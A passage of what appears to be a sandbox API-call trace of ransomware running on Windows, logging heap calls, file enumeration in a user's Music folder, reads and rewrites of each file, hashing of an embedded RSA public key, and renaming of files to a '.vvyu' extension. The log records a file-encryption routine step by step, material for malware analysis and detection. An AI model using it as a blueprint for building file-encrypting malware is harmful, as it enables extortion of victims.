HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b70 | out: hHeap=0x620000) returned 1 [0194.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea10f8 | out: hHeap=0x620000) returned 1 [0194.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0194.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.742] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x4d44, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x4d44, lpOverlapped=0x0) returned 1 [0194.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0194.743] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x4d49, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.743] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0194.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.744] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.745] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.745] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.745] CloseHandle (hObject=0x568) returned 1 [0194.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0194.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea3a68 [0194.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0194.747] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\p5Fl21.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\p5fl21.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\p5Fl21.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\p5fl21.m4a.vvyu")) returned 1 [0194.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.748] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.751] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x698cce90, ftCreationTime.dwHighDateTime=0x1d89fcc, ftLastAccessTime.dwLowDateTime=0x64815980, ftLastAccessTime.dwHighDateTime=0x1d8a27d, ftLastWriteTime.dwLowDateTime=0x64815980, ftLastWriteTime.dwHighDateTime=0x1d8a27d, nFileSizeHigh=0x0, nFileSizeLow=0x8a5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YXHaYB.mp3", cAlternateFileName="")) returned 1 [0194.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea10f8 [0194.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb45f0 [0194.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea10f8 | out: hHeap=0x620000) returned 1 [0194.752] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\YXHaYB.mp3") returned=".mp3" [0194.752] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\YXHaYB.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\yxhayb.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.752] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=35420) returned 1 [0194.752] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.755] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x8a36, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.755] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.758] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.758] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x8a5c, lpOverlapped=0x0) returned 1 [0194.759] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.759] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.759] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.759] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.760] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.760] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.760] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.760] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.760] GetLastError () returned 0x0 [0194.760] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.760] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.761] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.761] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.761] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a60) returned 0x2ea79b0 [0194.761] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea10f8 [0194.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b70 [0194.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b88 [0194.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bb8 [0194.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c18 [0194.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bd0 [0194.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.762] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0194.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea3a68 [0194.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bb8 | out: hHeap=0x620000) returned 1 [0194.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bd0 | out: hHeap=0x620000) returned 1 [0194.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c18 | out: hHeap=0x620000) returned 1 [0194.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c18 [0194.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0194.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2bd0 [0194.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2bb8 [0194.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0194.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0194.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0194.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0194.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bd0 | out: hHeap=0x620000) returned 1 [0194.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bb8 | out: hHeap=0x620000) returned 1 [0194.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c18 | out: hHeap=0x620000) returned 1 [0194.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0194.766] GetCurrentThreadId () returned 0x66c [0194.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea0220 [0194.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0194.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0194.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.766] GetCurrentThreadId () returned 0x66c [0194.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0194.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c18 [0194.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bb8 [0194.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0194.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2bd0 [0194.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ba0 [0194.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c30 [0194.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0194.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c00 [0194.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2be8 [0194.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c48 [0194.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2be8 | out: hHeap=0x620000) returned 1 [0194.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2be8 [0194.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c00 | out: hHeap=0x620000) returned 1 [0194.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0194.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bb8 | out: hHeap=0x620000) returned 1 [0194.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2bb8 [0194.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea3a68 [0194.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c18 | out: hHeap=0x620000) returned 1 [0194.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0194.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c48 | out: hHeap=0x620000) returned 1 [0194.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea3c78 [0194.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0194.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0194.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bb8 | out: hHeap=0x620000) returned 1 [0194.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3e90 [0194.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3c78 | out: hHeap=0x620000) returned 1 [0194.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e90 | out: hHeap=0x620000) returned 1 [0194.773] HeapFree (in: 